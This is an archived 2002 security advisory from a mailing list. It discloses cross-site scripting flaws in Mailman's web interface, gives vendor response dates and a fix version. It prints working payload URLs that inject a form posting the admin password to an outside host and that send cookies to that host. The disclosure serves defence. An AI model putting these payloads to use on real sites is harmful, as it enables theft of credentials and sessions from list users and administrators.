OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: office (office_at_office.ac)
Date: Wed Jul 24 2002 - 03:03:30 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Mailman: cross-site scripting bug

    Product: Mailman
    Affected Version: 2.0.11 and under it
    Vendor's URL: http://www.gnu.org/software/mailman/
    Solution: Use fixed version 2.0.12 or later

    Introduction:
    ------------
    Mailman is software to help manage electronic mail discussion lists, much
    like Majordomo or Smartmail. And Mailman have web interface system.

    Example:
    -----------------
    This is simple example for version 2.0.10:
    You can recognize the vulnerability with this type of URL;
    http://mailman_site/mailman_dirctory/admin/ml-name?"><script>alert("hello")</script>
    and that prove that any (malicious) script code is possible on web
    interface part of Mailman.

    For example, if you access to this URL with Internet Explorer (other
    browser is not affected by the URL), the page figure is similar to
    real one, but the password of admin you enter and submit are send
    to another malicious site (http://www.office.ac/). This URL are valid for version 2.0.10.

    http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="></form><form/action="http://www.office.ac/webform.cgi"/method="post"><br

    And Mailman 2.0.11 still have vulnerabilities, if you access to these
    URL with Internet Explorer (other browser is not affected by these
    URL), your information in cookie about the mailman_site could be
    send another malicious site (http://www.office.ac/).

    http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/onClick="window.open('http://www.office.ac/j.cgi?'+document.cookie);

    http://mailman_site/mailman/subscribe/ml-name?info=>document.location%3D"http://www.office.ac/j.cgi?"%2Bdocument.cookie;</script>

    Vendor's response:
    --------------
    The vendor were notified about first problem on 20th of May 2002.
    On same 20th May 2002, version 2.0.11 was released.
    http://mail.python.org/pipermail/mailman-announce/2002-May/000042.html

    And the vendor were notified about other problems on 21st of May 2002.
    The fixed version 2.0.12 was released on 11th of Jul 2002.
    http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html

    Solution:
    --------------
    Users should upgrade to Mailman 2.0.12 or later

    --
    office
    officeukky.net
    officeoffice.ac
    http://www.office.ac/